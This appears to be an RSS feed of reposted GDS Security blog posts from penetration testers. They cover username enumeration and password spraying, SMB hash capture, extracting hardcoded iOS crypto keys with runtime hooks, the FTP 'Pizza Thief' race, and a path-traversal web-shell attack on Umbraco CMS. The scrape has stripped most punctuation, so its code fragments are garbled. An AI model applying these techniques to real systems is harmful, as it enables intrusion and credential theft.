<item><title>Network Testing 101  If Your Name's Not Down, You're Not Getting In</title><description>Secuobs.com : 2013-03-26 16:05:25 - GDS Blog -    Looking at the basics of network testing, user enumeration is critical If we can get usernames, access is only a hop skip and a jump away Well, perhaps only a decent dictionary brute-force away The thing is how do we get these usernames  A few basic network pentesting tricks are listed here Also, as a lot of user names are predictable combinations  such as a combination of first and last names, and initials  it can be fun to find amusing user names on a network Simple User Name Enumeration Time to start with some of the simple stuff, SNMP  Simple Network Management Protocol  Some interesting MIBs  Management Information Base  that result in user enumeration are  Solaris   PROCESS USERNAMES 13614142312118    nix in general   MOUNTPOINTS 136121252313   RUNNING SOFTWARE PATHS 136121254214 Windows   Windows INSTALLED SOFTWARE 136121256312   Windows USERS 136141771225   Windows SHARES 136141771227 The MIBs listed above give away usernames Some are obvious The ones that are less obvious are RUNNING SOFTWARE PATHS and  in Windows  INSTALLED SOFTWARE these may disclose information in the path names as shown below  136121254214739   STRING   usr bin login  136121254214740   STRING   bin bash  136121254214749   STRING   home auser tail  As we can see, the user name auser is disclosed if the full path of the running binary is used Remember this works only if the user has used the full path to run the process The snmpwalk tool is a good place to start for enumerating SNMP data out of a host There is also the small matter of the community string you ll also need, however in many cases you can go with the defaults and get information back Changing these from the default is often overlooked when SNMP is enabled on servers Print My User Name Web and telnet interfaces on printers are often unauthenticated, unencrypted or use default or weak passwords It is often possible to connect to these repositories of information leakage and grab document names, share locations, and most importantly user names As a lot of printers have no lockout controls, even if admin account passwords have been changed you can often brute force passwords on these safely If we can gain admin access to the printer, there may be other interesting options available as well In one case, we came across an option to fax a copy of every document printed to a number of our choice Old Problems Never Die Username enumeration on a Windows domain can be easy or a pain On a box that accepts null connections we win We can get the users and also the password policy, shares etc, and tools like enum and enum4linux still have a valuable place in the tool kit But in a modern Windows AD domain don t forget the use of LDAP If it is possible to use null binds via LDAP, tools like ldapenumpl, ldpexe and nmap  script ldap-search  are a good starting point to give you that user list However, if you don t have null shares or anonymous bind then you may need to make authenticated connections to the domain to get the same data This means that one bad password on the network is a foothold to accessing the rest of the domain Research, Research, Research In a lot of Exchange environments the user s email address will contain their username Robert Smith, for example, is rsmith pentestcompanycom - it s likely that  rsmith  is his login But do remember that with common names this may not be the case A lot of this kind of data can be gathered from company web pages or Intranet sites  or even bouncing a couple of emails into the organisation can work for this If the company has an internal anonymously accessible wiki this can be a nice resource as well Listen, Did You Smell That  Sniffing network traffic can also help out with delivering those user names You may even get those passwords you re looking for - never discount the amount of clear text protocols that are still in use Also many companies will use TLS SSL on their public web sites, but not encrypt internally I Never Metadata I Didn t Like In Office documents the metadata will contain, amongst other things, the name of the user who created that document If we know the schema, this can give you the username Also if the company writes Silverlight or NET applications, then decompilation can give you pathnames, again with valid usernames Now Pay Attention 007 There is a reason to wear headphones with no music playing If you are sitting onsite amongst IT Staff or developers you may hear the phrase   What user should I log on as  around you If you are lucky they may even shout out passwords Also there is the old tried and true method of just asking Some call it social engineering but that s a topic for another post Sharing Your Toys So you find a file share Now there are lots of awesome things you can do  SMB relay attacks, trojan documents, DLL injection  if some one is dumb enough to share the wrong thing  But one of the other things you can do when a domain user visits the share is have a file there that points back to us This could be an image in the document, a second embedded document in our Excel sheet  that we host , or a malicious shortcut file with an icon on our machine When they access this, a bit of metasploit SMB sniffing and we can get the username as well as NTHASH and  if they are using it  the LMHASH Guess Who - Are You  bin  On smtp, ftp, and ssh there have been ways to brute force out usernames This is ok, but is really dependant on the list of usernames you start with In the spirit of recycling, never throw anything away - every time you gather a name, put it in a file Next time you have a chance to brute-force out names on an SMTP server via RCPT EXPN and VRFY you will have a good starting point Go Wide  So you ve got your big list of users  Now we take a big dictionary and hit go  - lock out the accounts and get asked to leave OR perhaps there is a better way  Time to chose a common password and wide-band it across all the accounts A usual rule is to assume they lock the accounts after 3 failed attempts So we could choose 2 candidate passwords and try those If you haven t found anything at all about the password policy before this stage, now would be a good time to do it When we know what we can risk, we can make the call and do some brute forcing For me, Medusa is my brute forcer of choice A nice feature is that Medusa that will let you look for  Joe Logins  as well as blank passwords The nice thing about this one is the tool is modular and supports a large list of protocols So now from a big list of users we send out 2 passwords per user per hour day week Eventually we get a hit Next we can use this authenticated access to get more user names and start the brute force loop again Voila   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/435868.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/435868.shtml</guid></item>
<item><title>Retrieving Crypto Keys via iOS Runtime Hooking</title><description>Secuobs.com : 2013-03-05 15:48:05 - GDS Blog -    I am going to walk you through a testing technique that can be used at runtime to uncover security flaws in an iOS application when source code is not available, and without having to dive too deeply into assembly I am going to use a recent example of an iOS application I reviewed, which performed its own encryption when storing data onto the device These types of applications are a lot of fun to look at due to the variety of insecure ways people implement their own crypto In this example the application required authentication, and then pulled down some data and stored it encrypted on the device for caching The data was presented to the user where they could  act  upon it Sounds pretty generic, but hopefully the scenario is familiar enough to those who assess mobile apps Upon analyzing the application traffic, it was obvious that no crypto keys were being returned from the server After sweeping the iOS Keychain and the entire Application container, I could make the educated assumption that the key is either a hardcoded value or derived using device specific information Using the Hopper Disassembler  Available on the Mac App Store , I was able to see that the application was leveraging the Common Crypto library for its encryption I checked the cross-references for calls to the CCCryptorCreate function in order find the code areas which perform encryption The following screenshot shows getSymmetricKeyBytes being called right before the CCCryptorCreate function I felt pretty confident that the purpose of the getSymmetricKeyBytes method was going to be to return the symmetric key used for encryption I decided to create a Mobile Substrate tweak in order to hook into getSymmetricKeyBytes and read the return value I used the class-dump-z tool to get a listing of all the exposed Objective-C interfaces From here it is easy to get more detailed information about the method, such as the class name, return type and any required parameters The following is a short snippet retrieved from the class-dump-z results  interface SecKeyWrapper   XXUnknownSuperclass   NSData  publicTag  NSData  privateTag  NSData  symmetricTag  unsigned typeOfSymmetricOpts  SecKey  publicKeyRef  SecKey  privateKeyRef  NSData  symmetricKeyRef     snip  - id getSymmetricKeyBytes  - id doCipher id cipher key id key context unsigned context padding unsigned padding   snip  We can quickly create a tweak by using the Theos framework The tweak in this case looked as follows  pourcentshook SecKeyWrapper -  id getSymmetricKeyBytes   NSLog HOOKED getSymmetricKey  id theKey   pourcentsorig  NSLog KEY  pourcents , theKey  return theKey    pourcentsend pourcentsctor   NSLog SecKeyWrapper is created  pourcentsinit    It doesn t do much more then read the return value of the original method call and write it out to the console It was possible to confirm that a static key was being used by running the tweak on another iPad, and observing that the same symmetric key was returned The next step was to decrypt the files We could hook into the doCipher key context padding method and just print out the first parameter to get the plaintext data That would work, but that wouldn t be reproducible since the Tweak code would only execute when the doCipher key context padding method is actually run by the application A quick Google search on the SecWrapper class turned up the following sample code from Apple http developerapplecom library ios samplecode CryptoExercise Listings Classes_SecKeyWrapper_mhtml By leveraging the wrapper it was possible to create an offline script to decrypt the application contents While looking at sample code I noticed two things The app developer chose to change Apple s implementation of the getSymmetricKeyBytes method and return a static key The other interesting discovery was bad practices in Apple s sample code for the doCipher key context padding method The following code snippet shows that it will use a static IV of 16 bytes of 0x0 s   Initialization vector  dummy in this case 0 s uint8_t iv kChosenCipherBlockSize  memset void   iv, 0x0,  size_t  sizeof iv  An alternative method to achieve the same result would be to use cycript, which provides a Javascript interpreter to hook run arbitrary objective-c code and also hook into iOS applications at runtime without having to go through the whole Mobile Substrate Tweak creation The following example shows how cycript could be used to retrieve the symmetric crypto key rgutie01s-iPad  root  cycript -p 290cy  var sharedwrapper    SecKeyWrapper sharedWrapper cy   sharedwrapper getSymmetricKeyBytes  To recap  1 Runtime analysis can be leveraged to easily break custom encryption when source code is not available and without having to dive into assembly 2 Developers need to beware of using sample code downloaded from the web, especially crypto code as it s really hard to get right  as shown by the sample from Apple   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/431490.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/431490.shtml</guid></item>
<item><title>Exploiting the Pizza Thief</title><description>Secuobs.com : 2013-02-26 19:13:52 - GDS Blog -    A while back we came across an exploitation scenario with an FTP server that we were assessing that we thought was interesting enough to share - largely because its an issue that has been known about since 1999, but doesn t seem to be widely exploited - at least publicly First its important to understand how FTP works when in passive mode, which is the most common configuration we come across in deployment nowadays FTP uses two separate TCP connections to the FTP server - a command channel and a data channel FTP commands are sent over the command channel, which is usually on port 21 The data channel is the connection that is used for a transfers of data, including directory listings or file downloads and uploads, and in passive mode this is another connection from the client to the FTP server on a port opened by the FTP server in order to send or receive the data For example, this is how a sample passive FTP session might go, including the commands that will be issued to the FTP server in the background Note the response to the PASV command, which supplies the IP address and port  in high low byte order  for the client to connect to  220 foobarcom FTP server ready Name  user --- USER user 331 Password required for user Password  password --- PASS password 230 User user logged in --- SYST 215 UNIX Type  L8 Remote system type is UNIX Using binary mode to transfer files ftp passive Passive mode on ftp ls --- PASV 227 Entering Passive Mode  192,168,1,1,195,149  --- LIST 150 Opening ASCII mode data connection for file list drwx------ 3 user users 104 Jul 27 01 45 my_files 226 Transfer complete ftp quit --- QUIT 221 Goodbye Visually this will look something like the following  Interestingly, looking at the RFC for FTP  RFC959  shows that the two connections do not both have to come from the same client, which allows FTP to support some less common usage scenarios such as server to server transfers using a common client For our purposes it raises the possibility that if we can hit the data port that is allocated on the FTP server at the right time, we will get the file transfer or directory listing that another client has requested, like follows  This race condition issue, as it turns out, has been known since 1999 as the  Pizza Thief  exploit  CVE-1999-0351 , and turns out to be fairly easy to exploit in actual usage scenarios that we ve come across In practice, guessing the port comes down to a combination of two factors - how much load the FTP server is under, and how randomly it allocates the data ports for downloads If the port allocation is sequential  which is not uncommon  this is fairly trivial, however as enterprise FTP deployments commonly have a small fixed range of ports allowed through a firewall for passive FTP, this can also be practical to exploit in cases where the data port allocation is randomised  even aside from any weaknesses in just how random the allocation actually is  If the server allows anonymous FTP, or you can obtain an account through other means, this just makes the job of predicting the data ports easier for you We ended up exploiting this scenario by writing a quick Python script to brute-force connect to the range of ports the server we were looking at was using, and grabbed a number of documents the organisation was sharing with an international business partner Turns out FTP isn t so secure after all   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/430131.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/430131.shtml</guid></item>
<item><title>Resurrecting Wifitap</title><description>Secuobs.com : 2013-02-13 19:25:46 - GDS Blog -    Security technology and common sense are not always 100pourcents compatible We recently encountered Cisco Wireless Client Isolation, a simple technology that prevents wireless clients from communicating with each other, used as a security control on an open wireless network Handy sounding technology that, except for one small problem   how do you prevent radio transceivers from communicating with each other  As the deployment didn t actually involve putting every wireless client into a Faraday cage and plugging them into Ethernet, we had to demonstrate why this setup was not exactly secure  Which brings us to wifitap, a set of very clever tools by Cédric Blancher that bridges a Linux tun tap device with a WiFi interface in monitor mode, and allows you to communicate directly with wireless clients without associating with an Access Point  AP  The way 80211 is supposed to work, an AP mediates all communication on the network, which means that in theory technology like Cisco Client Isolation would work great  However, in reality 80211 is   well   wireless There s no way to dictate exactly who sends what to whom in a wireless network, notwithstanding carefully designed encryption or some highly directional antenna design To exploit this, wifitap reads packets from victim to AP using a WiFi transceiver in monitor mode, and simply injects responses to those packets as if they came from the AP Neat trick Unfortunately wifitap hasn t been maintained in years, and even though it s included in Backtrack 5r3, it took a good bit of work to make it go In the interest of being good open-source netizens, we re sharing an updated version that should work on modern distros over here  https githubcom gdssecurity wifitap  We might even manage to keep it up to date Lastly, you might be thinking   Sure, open and WEP networks are insecure, but WPA2 fixed all these issues, right  Well, not so much  http wwwairtightnetworkscom WPA2-Hole196 Now where did I leave my Faraday cage   IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/427501.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/427501.shtml</guid></item>
<item><title>Using Content Security Policy to Prevent Cross-Site Scripting  XSS </title><description>Secuobs.com : 2013-02-05 16:05:19 - GDS Blog -    Note  This post has been crossposted from the SendSafely blog You can find the original post at http blogsendsafelycom post 42277333593 using-content-security-policy-to-prevent-cross-site On SendSafely we make heavy use of many new JavaScript APIs introduced with HTML5 We encrypt files, calculate checksums and upload data using pure JavaScript Moving logic like this down to the browser, however, makes the threat of Cross-Site Scripting  XSS  even greater than before In order to prevent XSS vulnerabilities, our site makes liberal use of pretty aggressive client-side and server-side encoding APIs These APIs are based on the OWASP ESAPI library, so we have context-specific encoding methods for pretty much every scenario Even so, we recognize that it is very difficult to rule out all possible ways to inject code, including human error on our part For this reason we chose to also implement Content Security Policy  CSP  for SendSafely CSP is a new security mechanism supported by modern browsers It aims to prevent XSS by white-listing URLs the browser can load and execute JavaScript from The server can, by specifying specific CSP directives, prevent the browser from executing things like in-line JavaScript, eval , setTimeout  or any JavaScript that comes from an untrusted URL The policy works as a white list, only domains listed are allowed to execute, everything else will be blocked The Content Security Policy in SendSafely In SendSafely, our Javascript files are all loaded from a dedicated host that doesn t run any dynamic content  staticsendsafelycom  The exceptions to this are for certain third-party JavaScript APIs that we load from an external domain, specifically Google Analytics and reCAPTCHA Text-to-JavaScript functions like eval  and setTimeout  are blocked across the board, even if the script is loaded from one of our white-listed hosts, as is any in-line JavaScript Use of a strict CSP makes it significantly harder to inject executable JavaScript into application pages since the code must come from a trusted server The typical XSS attack using un-encoded output on one of our pages won t work when the CSP is enforced In fact, any JavaScript embedded on our content pages  even JavaScript we put there  gets blocked by the policy Pretty cool stuff So you may be asking yourself, does this mean XSS is nothing but a memory  Sadly, this is not the case For starters, CSP is still fairly new and only supported by recent versions of Firefox, Safari and Chrome Internet Explorer 10  IE10  supports a subset of CSP options, but the ability to white list domains is unfortunately not one of them Aside from limited browser support, data dynamically loaded into the page from JavaScript is still potentially vulnerable A strict Content Security Policy should therefore not be considered the end-all solution to XSS  Think of CSP more like a safety belt, which is nice to have when your car crashes Dissecting our Policy Now let s take a look at the CSP policy we use on wwwsendsafelycom and dissect it a bit One of the first things to note is that if you are going to implement CSP, you must realize that there are some browser compatibility nuances to deal with The main thing to note is that Safari uses  X-WebKit-CSP  as the header name for implementing CSP, while other browsers have standardized on  X-Content-Security-Policy  Another glitch that affects Safari is that a severe bug in the CSP implementation on Version 51 essentially blocks authorized content when a valid CSP is specified As a result, you ll want to specifically detect when Safari is used and send either the  X-WebKit-CSP  header or no header at all  if Version 51 is used  To keep our policy as strict as possible, we use two different policies depending on what the page needs to do The stricter policy is used for all pages except the ones that handle encryption and decryption  the reason for this will be discussed in a separate follow up post  For simplicity, the more strict policy will be explained here X-Content-Security-Policy  default-src  none  connect-src  self  script-src https staticsendsafelycom https wwwgooglecom https sslgoogle-analyticscom  style-src  self   unsafe-inline  http  https  img-src  self  https wwwgooglecom https sslgoogle-analyticscom  report-uri  csp-reports  The header is divided into different sections that are each separated by a semi-colon The  default-src  directive defines the security policy for all types of content which are not expressly called out by more specific directives We opted to set the default-src value to  none , meaning that by default we allow nothing to load If we stopped defining directives here, the site would be completely broken, so now we need to open up the policy and allow specifically what we need to load Now that we ve explicitly denied everything by default, we need to add back the specific content policy options our site needs On SendSafely, we have a hand full of resource categories that we need to add policy settings for Each of these are outlined below, along with the CSP directives for each    Ajax Requests - Several pages within our site use the browser s XMLHttpRequest  XHR  object to make HTTP requests from within our JavaScript code In order for us to make these requests we set the  connect-src  attribute to  self , so scripts on our site can make XHR requests back the server but nowhere else This attribute is another place where we run into compatibility issues across different browsers Specifically, FireFox decided to name this directive  xhr-src  instead of  connect-src  To account for this, our CSP code does some basic browser detection and if we detect that FireFox is being used, we change the directive name accordingly   JavaScript - As mentioned previously, we load all of our internal static JavaScript from a dedicated host  staticsendsafelycom  Additionally, we ve chosen to load the Google Analytics and ReCaptcha JavaScript files from their origin domains on googlecom Unfortunately the ability to allow just a sub-path of a host  like  scripts  is not supported Since ReCaptcha script files get loaded directly off of the main wwwgooglecom site, our  script-src  directive includes https staticsendsafelycom, https wwwgooglecom and https sslgoogle-analyticscom Having such a large site like wwwgooglecom in our CSP whitelist is understandably something we are not thrilled about The ability to allow sub-paths of a host is slated to be introduced in CSP 11, but until then we ll have to live with it The good news is that Google takes security very seriously, and they take great care to avoid script injection bugs on their website   CSS - Our site design makes heavy use of in-line CSS for styling various UI attributes As such, the style-src directive includes a value of  self   that allows us to load CSS files from the same host  and a value of  unsafe-inline , meaning that we can use in-line CSS from within our HTML pages We recognize that by allowing in-line CSS within our pages, there is a minimal increased security risk since someone could potentially be mischievous if they found a way to inject markup into one of our pages Given the cost benefit of refactoring the UI to completely avoid any in-line CSS, however, we decided this is a tolerable risk that we can live with for now   Images - Our img-src directive specifies both  self  and the two previously mentioned google hosts  https wwwgooglecom and https sslgoogle-analyticscom  as the authorized origin hosts for all image content For the most part, our site only loads images from the same host The exception to this is reCaptcha, however, since reCaptcha loads various images from wwwgooglecom domain   The final part of our CSP header is the  report-uri  directive This directive tells the browser to send us a report of pages that violate the Content Security Policy The violation reports consist of JSON documents sent via an HTTP POST request to the specified URI Using this option, we can monitor for events that trigger CSP exceptions and quickly take action if we think there may be a problem with our site The reports are also great to use during testing and development in order to debug CSP issues you might encounter Final Notes A few final notes  CSP is a great tool to add an additional layer of protection against Cross-Site Scripting If you re building a new application, CSP should be considered as a solid defense in depth security control in the never-ending battle against cross-site scripting Writing client-side code which is designed to use CSP will save precious developer cycles in the future, if code must be migrated to work with CSP Implementing CSP on our site proved to be a very interesting exercise We ll provide more details on some other aspects of our Content Security Policy implementation in a follow up post here on our blog  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/425848.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/425848.shtml</guid></item>
<item><title>Introducing SendSafelycom  An Easier way to Securely Send Files</title><description>Secuobs.com : 2012-12-19 16:39:02 - GDS Blog -    Imagine this scenario  It is 4PM on a Thursday afternoon You ve worked hard all week, doing what just may be your best work ever You ve been scrambling to finish up a report you owe your favorite, but most demanding client You promised to deliver it to them by the end of day, since their boss needs the report before the go no-go meeting in the morning It s been peer reviewed, and you give it your final once over to make sure everything is perfect You open your email client, attach the report to the message, and then press the GPG  Encrypt  button The mail client chokes a few times, which you chalk up as normal when dealing with GPG, and finally the email is sent Life is good As you reach into the beer fridge to crack open a celebratory stout in the mini fridge you keep below your desk  doesn t everyone have one of those , you see a reply come into your inbox  Thanks for the report I had to duck out of the office early today to make it to my son s baseball game Please send the report to my assistant instead so he can have it ready for tomorrow s meeting You re the best  Hmm, ok no problem let s just send the report to the assistant instead Obviously, sending the plain-text file via email is not an option You send the assistant an email asking for their GPG PGP key  What s GPG  the assistant replies Ok, not surprising Time to move to Plan B send them an encrypted ZIP file You start by generating a nice random combination of letters, numbers and symbols You use that as the password to encrypt the ZIP with AES-256, and send it off Now all you need to do is call them with the password As you pick up the phone to call them, a reply comes into your inbox from postmaster yourclientcom  Error 582 - Email Attachment Security Policy Violation  You curse to yourself as you vaguely remember suggesting to them a few months back that they bolster their email filtering capabilities by using a cloud service like Google s Postini, rather than the traditional signature-based software they were previously using Unfortunately to your disadvantage, this message confirms that they took your advice In an act of desperation you rename the  reportzip  file to  report_ , hoping that the mail filter is dumb enough to just look at the file extension The identical auto-reply that comes back moments later, confirming what you already knew it wouldn t be that easy Ok, time to move to Plan C, sending the file through a web-based server your company runs specifically for such situations You remember the company network admin boasting about the steps he took to harden the server when it was first stood up, but you decide to stick with the encrypted ZIP as an extra layer of protection You upload the file, publish it to an external link, email the link to the assistant, and call them to provide the password  Ok, the file looks like its downloading hold on and I ll make sure I can open it  You start to breathe a sigh of relief as it looks like you are finally close to being done  I m opening it now , says the assistant as you slowly reach down once again towards the mini fridge  Hmm, it s telling me Windows cannot complete the extraction  You quickly realize you ve been foiled once again, when you remember that Windows can t natively open AES-encrypted ZIP files  Windows can only open ZipCrypto protected files natively  As a last ditch effort, you ask the assistant to Google the terms  WinZip  or  7Zip  and follow the download links for each, but the WebSense proxy they recently implemented  also based partly on your advice  quickly blocks both downloads As you start to pull out your hair and think of what to do next, you wish there was a better way Well now there is Meet SendSafely Some of you may know we recently previewed a new platform, which we developed, at OWASP AppSec USA in Austin, TX The platform is called SendSafely, and it s designed to facilitate secure file exchange using only a web browser Being a team of security consultants, we were repeatedly faced with multiple variations of the scenario outlined above With SendSafely, you only need a modern web browser to quickly and easily exchange encrypted files with anyone No pre-shared keys, no software to install If you re interested to see how it works we ve got a high-level explanation here and a more detailed explanation here If you haven t tried it out, we encourage you to sign up for free and take it for a test drive Our goal with SendSafely is to become the standard for secure file transfers We aren t a Dropbox replacement, nor do we aim to be Think of them as the mini-storage unit you rent every month to hold onto all of that extra stuff you own Instead, think of us as the secure FedEx or UPS of the digital world If you want to send something important to someone else, and you want to get it there fast and securely, then use SendSafely You can also check out the SendSafely Blog, where we ll be blogging about the challenges we ve dealt with, and things we ve learned, while building a secure cloud-based application platform Stay tuned for more updates, and tell us what you think of SendSafely we re all ears  You can reach us at info sendsafelycom or feel free to post your comments right here on our blog  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/417841.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/417841.shtml</guid></item>
<item><title>Plaintext Caching with iOS Document Interaction APIs</title><description>Secuobs.com : 2012-08-14 10:21:54 - GDS Blog -    The iOS Document Interaction APIs provide applications with the ability to have another application installed on the device handle a file The most common scenario of this behavior is the Mail application The Mail application receives emails which may contain document files like PDFs as attachments Although the Mail application does have PDF preview functionality, there may be a separate PDF viewing or editing application installed on the device The Mail application therefore opts to leverage the Document Interaction API in order to provide users with the ability to open the attached PDF file using any application on the device registered to handle PDF file types iOS applications can register to handle file types by setting the supported UTI types within the  CFBundleDocumentTypes  section of their Infoplist file The application would also need to implement the  application didFinishLaunchingWithOptions  application delegate method to handling incoming files When applications leverage the Documentation Interaction APIs to View or Open a file with another application, iOS will already know which applications have registered to handle the data type The UI displays a listing of installed applications which can handle the file type At this point, people familiar with iOS may be wondering how this Open In  functionality works due to the security restrictions of the iOS application sandbox The sandbox prevents one application from accessing any data stored within another application s container When a user chooses an application listed in the  Open In  prompt, a copy of the file is made to the other application s container This is where it starts to get interesting The copy of the file is written to the receiving application s Documents Inbox folder This file is not stored using data protection and will persist on the device even after the application is closed or the device is rebooted This becomes an issue when dealing with sensitive files in  secure container  applications Secure containers are applications which implement their own form of data protection in order to supplement the data protection feature provided by iOS In many cases these custom secure containers are created due to not having the ability to enforce device pass-codes on unmanaged devices One scenario we encountered was a secure container application that wanted to incorporate  Open In  functionality for sending files to the Good For Enterprise  GFE  application The GFE application would then provide users with the ability to email the received documents using their corporate email Since GFE is also a secure container application, the organization assumed the file would remain encrypted on the device Due to the discussed plaintext caching of the file, it becomes the receiving application s responsibility to perform proper clean up of any files it has received Unfortunately, GFE was not performing the necessary cleanup and the file remained stored in plaintext The main take away from the blog post should be to be very cautious when performing any form of inter-process communication with sensitive documents in your iOS application IOS contains many subtle caching issues which could cause data expected to be stored encrypted to be unintentionally cached elsewhere in plaintext  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/393414.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/393414.shtml</guid></item>
<item><title>Find Bugs Faster with a WebMatrix Local Reference Instance</title><description>Secuobs.com : 2012-07-03 10:12:38 - GDS Blog -    An ever increasing number of modern web applications are created using open source web frameworks and libraries Open Source Content Management Systems are a popular example for quickly and easily creating and publishing web content with a professional, polished appearance However, look closely under the hood of a typical CMS-developed site and you ll often find a mass of  often unintentionally  exposed attack surface When I encounter an Open Source framework in a black-box security assessment, I will look into creating a local  reference instance  a local version of the remote target site application  or as much of it as possible  that is completely under my control This effectively moves a large percentage of the assessment from a black-box test to grey-box Why  Because using this technique I can find a greater number of security bugs in a much shorter timeframe However  installing and configuring a local reference can sometimes be quite time consuming With every minute diverted away from testing often having to be justified, what is required is a means to easily and reliably  spin up  a testing environment containing the targeted web framework component as quickly as possible Where the target OS is Linux-based, I ll reach for a virtual machine  application stack  like Bitnami  but what about Windows-based frameworks  Enter Microsoft WebMatrix WebMatrix is a web application deployment technology that allows users to easily install dynamic web applications You need a host system with Windows 7 to take full advantage of WebMatrix, however with that you can easily and legally install everything you need to need to create a local instance of more than 50  web applications falling into seven key categories, namely  blogs, CMS, eCommerce, Forums, Galleries, Tools, and Wiki The initial install and ensuing patching frenzy can take about an hour to complete After that, installing and running a new dynamic web application usually takes no more than a few minutes Attacking Umbraco   A Real Life Example Note   The vulnerabilities described below were reported to the vendor and patched in September 2011 During an engagement last year, I used WebMatrix to create a local instance of the Umbraco CMS and identified a number of vulnerabilities in Umbraco CMS 470 Two of which, when combined, permitted an unauthorised remote attacker to write arbitrary content into the CMS web root I then used this to place a simple web shell on the target, resulting in arbitrary remote code execution What follows is a blow by blow description of the how the issues were found Once I have a local WebMatrix instance set up containing the targeted framework, I usually begin by locating any administrative login pages in my local instance and verifying whether these are accessible on the remote target It s not uncommon to find a CMS administrative login page located in a subdirectory of an internet-exposed application, and accessible to anyone with knowledge of the right URL Once I have identified the location of the CMS directory in the remote target, I enumerate the exposed attack surface by grabbing a file listing of my local instance CMS directory contents, and feeding this into Burp Intruder to identify any pages that are accessible without authentication In addition to creating a list of accessible pages  by enumerating requests that result in HTTP status code 200 responses  I also look into responses that return HTTP status 302 and 500 responses Sometimes you ll see a  long 302 , where the application redirects the browser back to a login page or an error page, but includes sensitive content in the body of the 302  possibly as a result of an Execute After Redirect vulnerability  While enumerating functionality exposed to unauthenticated users using the directory listing and Burp Intruder, it became clear that Umbraco was exposing a number of web services These web services were not apparent during normal use of the  parent  application leveraging the Umbraco functionality Each web service published a service description, which provided all the information required to interact with each web service operation Most of the interesting operations required credentials in the form of a username password pair An operation called SaveDLRScript  published as part of the codeEditorSave web service  caught my eye as it did not require credentials, and received string values for fileName and fileContents parameters With a few adjustments  thanks to the help of some verbose SOAP error messages , I was able to create a suitable unauthenticated POST request that caused SaveDLRScript to write out a text file on the host  POST  build umbraco webservices codeEditorSaveasmx HTTP 11 Host  localhost Content-Type  text xml  charset utf-8 Content-Length  516 SOAPAction   http tempuriorg SaveDLRScript  Connection  close     testtext string  test  1    As a result of issuing the POST request, a  true  message was returned But where was my text file  In a black-box test I d have to issue a request for testtxt in each sub-directory  a simple problem to solve using Burp Intruder and a target map   but what if the file was written into a directory not exposed to unauthenticated users  Or outside of the web root  In order to minimise any wasted test time, I used my local instance to get a head start and search the file system for testtxt This is an example of the shortened feedback loops a local instance can provide Sure enough, the text file had been written into the  macroscripts  sub-directory I then set out to place a web shell on my local instance as a trial run Once again, having a local instance of the CMS was of great benefit here in that testing could be performed on my local server, and a Proof of Concept attack developed without hitting the client s systems The next problem was that placing web shell code into a POST request parameter resulted in a web shell that wouldn t execute This was easily solved within the Burp Repeater by selecting and right clicking on the web shell source code and selecting the HTML encode key characters menu option HTML encoding key characters in Burp Repeater I then hit another problem  unauthenticated users were not allowed to access aspx or asp files in the  macroscripts  directory The obvious solution was to traverse up out the  macroscripts  directory, up into the parent  build  directory, then traverse back down into the  umbraco  directory  this had to allow unauthenticated users to access aspx files as it contained the loginaspx page I needed a path traversal flaw in the fileName parameter of SaveDLRScript I reverted back to using a simple text file as the payload  I generally search for vulnerabilities using benign payloads, which I then switch out for a proper payload once I have a working exploit  Simply naming the file  testtxt did not have the desired effect I wanted to perform automated path traversal fuzzing on this code, so I combined two of my favourite things  Burp Intruder and fuzzdb I set a payload marker prior to the filename within the POST request, loaded the traversals-8-deep-exotic-encodingtxt file into the intruder payloads, and launched the attack After a short time, a copy of testtxt appeared in the parent  build  directory - bingo  Unauthenticated, remote write access to a script-executable directory was within easy reach  Fuzzing the fileName parameter of the SaveDLRScript operation It s worth noting here that the server response was exactly the same both when the exploit was successful and when it was not  a status response of 500 and an error message Someone relying wholly upon spotting anomalies in the responses might have missed this vulnerability entirely Now I had a new problem  which one of my intruder fuzz strings caused the path traversal to occur  The responses were all the same  a status 500 error I re-configured the Intruder to use the  battering ram  attack type to write the same payload value both the fileName and the fileContents parameters at the same time  then all I had to do was repeat the Intruder attack, wait for my file to written out to the  build  directory, and read the content of the file Using this method I found that naming the file   testtxt caused it to be written to the  build  directory, from there, I could traverse down to the  umbraco  directory by simply naming the file   umbraco testtxt By combining the unauthorised write access offered by the SaveDLRScript operation with the path traversal flaw in the fileName parameter, I was able to write a web shell into the  umbraco  directory  where unauthenticated users can execute scripts  and hence gain unauthorised remote code execution within the security context of the web server process Finally - some advice for Umbraco  and all CMS  administrators  always upgrade to latest version available and apply security patches as soon as possible  obviously, including robust patch and upgrade testing  The issues described above were rapidly patched after I reported them to the vendor in September 2011 Beyond patching  it s always a good idea to identify exactly what functionality is publically exposed by your website, review what the requirements are, and impact of, exposing this functionality is, and to restrict access to, or simply remove any unnecessary dangerous functionality So there it is I ve introduced the concept of using WebMatrix to quickly create local test reference installations for popular open source web frameworks and components, and I ve walked through the discovery of a high-impact vulnerability in Umbraco CMS 470 using Burp and fuzzdb All of which was made easier and faster via a local reference instance created in 15 minutes  IMAGE   IMAGE   IMAGE  </description><link>http://www.secuobs.com/revue/news/385122.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/385122.shtml</guid></item>
